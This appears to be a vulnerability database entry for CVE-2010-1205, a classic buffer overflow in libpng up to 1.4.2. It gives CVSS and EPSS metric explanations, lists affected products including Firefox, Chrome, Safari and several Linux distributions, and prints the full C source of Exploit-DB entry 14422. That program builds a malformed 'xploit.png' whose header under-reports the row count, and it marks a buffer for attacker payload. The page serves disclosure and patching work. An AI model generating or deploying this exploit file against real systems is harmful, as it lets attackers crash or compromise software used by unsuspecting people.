Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-120 |
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V3.1 |
9.8 |
CRITICAL |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Base: Exploitabilty MetricsThe Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). Attack Complexity This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. User Interaction This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component. The vulnerable system can be exploited without interaction from any user. Base: Scope MetricsThe Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope. Scope Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs. An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority. Base: Impact MetricsThe Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable). Temporal MetricsThe Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability. Environmental MetricsThese metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.
|
[email protected] |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 14422
Publication date : 2010-07-19 22h00 +00:00
Author : kripthor
EDB Verified : Yes
/*
Exploit Title: libpng <= 1.4.2 DoS
Date: July 20, 2010
Author: kripthor
Software Link: http://www.libpng.org/pub/png/libpng.html
Version: all products that use libpng <= 1.4.2
Tested on: Windows XP Pro SP3 Eng / Ubuntu 10
CVE : CVE-2010-1205
Notes: This crashes Firefox <= 3.6.6 and Thunderbird <= 3.0.4
inkscape, png2html, etc...
ALL products that use libpng <= 1.4.2 maybe vulnerable.
References:
libpng.org
RFC-2083
RFC 1950
RFC 1951
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <assert.h>
#include <unistd.h>
#define BASE 65521L /* largest prime smaller than 65536 */
/*
Update a running Adler-32 checksum with the bytes buf[0..len-1]
and return the updated checksum. The Adler-32 checksum should be
initialized to 1.
Usage example:
unsigned long adler = 1L;
while (read_buffer(buffer, length) != EOF) {
adler = update_adler32(adler, buffer, length);
}
if (adler != original_adler) error();
*/
unsigned long update_adler32(unsigned long adler, unsigned char *buf, int len)
{
unsigned long s1 = adler & 0xffff;
unsigned long s2 = (adler >> 16) & 0xffff;
int n;
for (n = 0; n < len; n++) {
s1 = (s1 + buf[n]) % BASE;
s2 = (s2 + s1) % BASE;
}
return (s2 << 16) + s1;
}
/* Return the adler32 of the bytes buf[0..len-1] */
unsigned long adler32(unsigned char *buf, int len)
{
return update_adler32(1L, buf, len);
}
/* CRC based on implementation by Finn Yannick Jacobs */
/* crc_tab[] -- this crcTable is being build by chksum_crc32GenTab().
* so make sure, you call it before using the other
* functions!
*/
u_int32_t crc_tab[256];
/* chksum_crc() -- to a given block, this one calculates the
* crc32-checksum until the length is
* reached. the crc32-checksum will be
* the result.
*/
unsigned int chksum_crc32 (char *block, unsigned int length)
{
register unsigned long crc;
unsigned long i;
crc = 0xFFFFFFFF;
for (i = 0; i < length; i++)
{
crc = ((crc >> 8) & 0x00FFFFFF) ^ crc_tab[(crc ^ *block++) & 0xFF];
}
return (crc ^ 0xFFFFFFFF);
}
/* chksum_crc32gentab() -- to a global crc_tab[256], this one will
* calculate the crcTable for crc32-checksums.
* it is generated to the polynom [..]
*/
void chksum_crc32gentab ()
{
unsigned long crc, poly;
int i, j;
poly = 0xEDB88320L;
for (i = 0; i < 256; i++)
{
crc = i;
for (j = 8; j > 0; j--)
{
if (crc & 1)
{
crc = (crc >> 1) ^ poly;
}
else
{
crc >>= 1;
}
}
crc_tab[i] = crc;
}
}
int main(void) {
chksum_crc32gentab();
// VALID PNG FILE BEGINS
//PNG FILE SIGNATURE
char PNG_SIGN[] = "\x89\x50\x4e\x47\x0d\x0a\x1a\x0a";
// IHDR CHUNCK size
char PNG_IHDR_SIZE[] = "\x00\x00\x00\x0d";
// IHDR CHUNCK IHDR string id
char PNG_IHDR[] = "IHDR";
// IMAGE WIDTH 4 bytes
char PNG_IHDR_WIDTH[] = "\x00\x00\x00\x10";
// IMAGE HEIGTH 4 bytes
char PNG_IHDR_HEIGHT[] = "\x00\x00\x00\x02";
// IMAGE ATTRS 5 bytes: bit depth, color type, compression, filter and interlace method
char PNG_IHDR_ATTRS[] = "\x08\x06\x00\x00\x00";
// CRC32 excluding size!
//char PNG_IHDR_CRC32[] = "\x51\xed\x5c\xf1";
// OTHER FIELDS sRGB, pHYs, tIME
char PNG_OTHER_FIELDS[] ="\x00\x00\x00\x01\x73\x52\x47\x42\x00\xae\xce\x1c\xe9\x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x0b\x13\x00\x00\x0b\x13\x01\x00\x9a\x9c\x18\x00\x00\x00\x07\x74\x49\x4d\x45\x07\xda\x07\x0c\x14\x1c\x38\x52\xdd\x18\x2e";
// IDAT CHUNCK SIZE
char PNG_IDAT_SIZE[] = "\x00\x00\x00\x8d";
// IDAT CHUNCK IDAT string id
char PNG_IDAT[] = "IDAT";
// data in zlib format!
char PNG_IDAT_DATA_ZLIB_HEADER[] = "\x08\x1d\x01\x82\x00\x7d\xff";
// zlib content, size in RGBa with no compression = height*width*4;
//char PNG_IDAT_DATA_ZLIB_CONTENT[] = "\x01\xff\x00\x00\xff\x01\xff\x30\x00\x00\x01\xcf\x00\x2b\x2a\x2b\x00\x11\x12\x11\x00\x10\x10\x11\x00\x11\x11\x11\x00\x11\x11\x11\x00\x11\x11\x12\x00\x11\x11\x10\x00\x11\x11\x10\x00\x11\x11\x12\x00\x10\x11\x11\x00\x11\x11\x11\x00\x12\x11\x10\x00\x10\x10\x11\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01\x00\xff\xff\x00\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x01\x00\xff\x00\x00\x00\x01\x00\xff\x00\x01\x00\x00\x00\xff\xff\x01\x00\x01\x01\x00\x00";
// adler32 of zlib_content
//char PNG_IDAT_DATA_ZLIB_ADLER32[] = "\xb1\xa6\x0d\xe5";
// CRC32 excluding size!
//char PNG_IDAT_CRC32[] = "\x88\x3b\xb3\xfe";
// IEND CHUNCK
char PNG_IEND_CHUNCK[] = "\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82";
// VALID PNG FILE ENDS
//-----------------------------------------------------------------------------------
//---------------------------------
// TRIGGER OVERFLOW.
// WE ARE GOING TO CREATE A PNG WITH 2 ROWS AND MARK IT AS HAVING 1 ROW
// OUR BUFFER CAN BE width*height*4+height in size
// CHOOSE A WIDTH (crashes occur around 512 width)
int WIDTH = 700;
unsigned int w = htonl(WIDTH);
memcpy(PNG_IHDR_WIDTH,&w,4);
int HEIGHT = 2;
// TRIGGER OVERFLOW REPORT HEIGHT-1 IN THE HEADER
unsigned int h = htonl(HEIGHT-1);
memcpy(PNG_IHDR_HEIGHT,&h,4);
// USE THIS BUFFER FOR YOUR PWNSAUCE ?
int idat_zlib_data_size = WIDTH*HEIGHT*4+HEIGHT;
unsigned char *buf = malloc(idat_zlib_data_size);
memset(buf,0x41,idat_zlib_data_size);
// USE THIS BUFFER FOR YOUR PWNSAUCE ?
// FIX ZLIB HEADERS IN THE IDAT BLOCK
short int zblock_size = (short int) idat_zlib_data_size;
short int zblock_size_2c = -zblock_size-1;
memcpy(PNG_IDAT_DATA_ZLIB_HEADER+3,&zblock_size,2);
memcpy(PNG_IDAT_DATA_ZLIB_HEADER+5,&zblock_size_2c,2);
unsigned int idat_new_size = htonl(idat_zlib_data_size+11);
memcpy(PNG_IDAT_SIZE,&idat_new_size,4);
//---------------------------------
//-----------------------------------------------------------------------------------
FILE * f;
f = fopen ( "xploit.png" , "wb" );
fwrite (PNG_SIGN , 1 , sizeof(PNG_SIGN)-1 , f );
fwrite (PNG_IHDR_SIZE , 1 , sizeof(PNG_IHDR_SIZE)-1 , f );
fwrite (PNG_IHDR , 1 , sizeof(PNG_IHDR)-1 , f );
fwrite (PNG_IHDR_WIDTH , 1 , sizeof(PNG_IHDR_WIDTH)-1 , f );
fwrite (PNG_IHDR_HEIGHT , 1 , sizeof(PNG_IHDR_HEIGHT)-1 , f );
fwrite (PNG_IHDR_ATTRS , 1 , sizeof(PNG_IHDR_ATTRS)-1 , f );
//fwrite (PNG_IHDR_CRC32 , 1 , sizeof(PNG_IHDR_CRC32)-1 , f );
//CALCULATE NEW CRC
int ihdr_data_size = sizeof(PNG_IHDR)-1+sizeof(PNG_IHDR_WIDTH)-1+sizeof(PNG_IHDR_HEIGHT)-1+sizeof(PNG_IHDR_ATTRS)-1;
char* ihdr_data = malloc(ihdr_data_size);
memcpy(ihdr_data,PNG_IHDR,sizeof(PNG_IHDR)-1);
memcpy(ihdr_data+sizeof(PNG_IHDR)-1,PNG_IHDR_WIDTH,sizeof(PNG_IHDR_WIDTH)-1);
memcpy(ihdr_data+sizeof(PNG_IHDR)-1+sizeof(PNG_IHDR_WIDTH)-1,PNG_IHDR_HEIGHT,sizeof(PNG_IHDR_HEIGHT)-1);
memcpy(ihdr_data+sizeof(PNG_IHDR)-1+sizeof(PNG_IHDR_WIDTH)-1+sizeof(PNG_IHDR_HEIGHT)-1,PNG_IHDR_ATTRS,sizeof(PNG_IHDR_ATTRS)-1);
unsigned int crc32_ihdr = htonl(chksum_crc32(ihdr_data,ihdr_data_size));
fwrite ( &crc32_ihdr, 1 , 4 , f );
fwrite (PNG_OTHER_FIELDS , 1 , sizeof(PNG_OTHER_FIELDS)-1 , f );
fwrite (PNG_IDAT_SIZE , 1 , sizeof(PNG_IDAT_SIZE)-1 , f );
fwrite (PNG_IDAT , 1 , sizeof(PNG_IDAT)-1 , f );
fwrite (PNG_IDAT_DATA_ZLIB_HEADER , 1 , sizeof(PNG_IDAT_DATA_ZLIB_HEADER)-1 , f );
fwrite (buf , 1 ,idat_zlib_data_size,f);
//CALCULATE NEW ADLER-32 FOR ZLIB DATA
unsigned int adler32_zlib_data = htonl(adler32(buf,idat_zlib_data_size));
fwrite ( &adler32_zlib_data, 1 , 4 , f );
//CALCULATE NEW CRC
int idat_data_size = sizeof(PNG_IDAT)-1+sizeof(PNG_IDAT_DATA_ZLIB_HEADER)-1+idat_zlib_data_size+4;
char* idat_data = malloc(idat_data_size);
memcpy(idat_data,PNG_IDAT,sizeof(PNG_IDAT)-1);
memcpy(idat_data+sizeof(PNG_IDAT)-1,PNG_IDAT_DATA_ZLIB_HEADER,sizeof(PNG_IDAT_DATA_ZLIB_HEADER)-1);
memcpy(idat_data+sizeof(PNG_IDAT)-1+sizeof(PNG_IDAT_DATA_ZLIB_HEADER)-1,buf,idat_zlib_data_size);
memcpy(idat_data+sizeof(PNG_IDAT)-1+sizeof(PNG_IDAT_DATA_ZLIB_HEADER)-1+idat_zlib_data_size,&adler32_zlib_data,4);
unsigned int crc32_idat = htonl(chksum_crc32(idat_data,idat_data_size));
fwrite ( &crc32_idat, 1 , 4 , f );
fwrite (PNG_IEND_CHUNCK , 1 , sizeof(PNG_IEND_CHUNCK)-1 , f );
fclose (f);
//OPEN XPLOIT.PNG WITH YOUR FAVORITE BROWSER/IMAGE EDIT APP/ETC
return 0;
}
Products Mentioned
Configuraton 0
Libpng>>Libpng >> Version To (excluding) 1.2.44
Libpng>>Libpng >> Version From (including) 1.4.0 To (excluding) 1.4.3
Configuraton 0
Google>>Chrome >> Version To (excluding) 5.0.375.99
Configuraton 0
Apple>>Itunes >> Version To (excluding) 10.2
Apple>>Safari >> Version To (excluding) 5.0.4
Apple>>Iphone_os >> Version From (including) 2.0 To (including) 4.1
Apple>>Mac_os_x >> Version From (including) 10.6.0 To (excluding) 10.6.4
Apple>>Mac_os_x_server >> Version From (including) 10.6.0 To (excluding) 10.6.4
Configuraton 0
Fedoraproject>>Fedora >> Version 12
Fedoraproject>>Fedora >> Version 13
Configuraton 0
Opensuse>>Opensuse >> Version 11.1
Opensuse>>Opensuse >> Version 11.2
Suse>>Linux_enterprise_server >> Version 9
Suse>>Linux_enterprise_server >> Version 10
Suse>>Linux_enterprise_server >> Version 11
Suse>>Linux_enterprise_server >> Version 11
Configuraton 0
Vmware>>Player >> Version From (including) 2.5 To (excluding) 2.5.5
Vmware>>Player >> Version From (including) 3.1 To (excluding) 3.1.2
Vmware>>Workstation >> Version From (including) 6.5.0 To (excluding) 6.5.5
Vmware>>Workstation >> Version From (including) 7.1 To (excluding) 7.1.2
Configuraton 0
Canonical>>Ubuntu_linux >> Version 6.06
Canonical>>Ubuntu_linux >> Version 8.04
Canonical>>Ubuntu_linux >> Version 9.04
Canonical>>Ubuntu_linux >> Version 9.10
Canonical>>Ubuntu_linux >> Version 10.04
Configuraton 0
Debian>>Debian_linux >> Version 5.0
Configuraton 0
Mozilla>>Firefox >> Version To (excluding) 3.5.11
Mozilla>>Firefox >> Version From (including) 3.5.12 To (excluding) 3.6.7
Mozilla>>Seamonkey >> Version To (excluding) 2.0.6
Mozilla>>Thunderbird >> Version To (excluding) 3.0.6
Mozilla>>Thunderbird >> Version From (including) 3.0.7 To (excluding) 3.1.1
References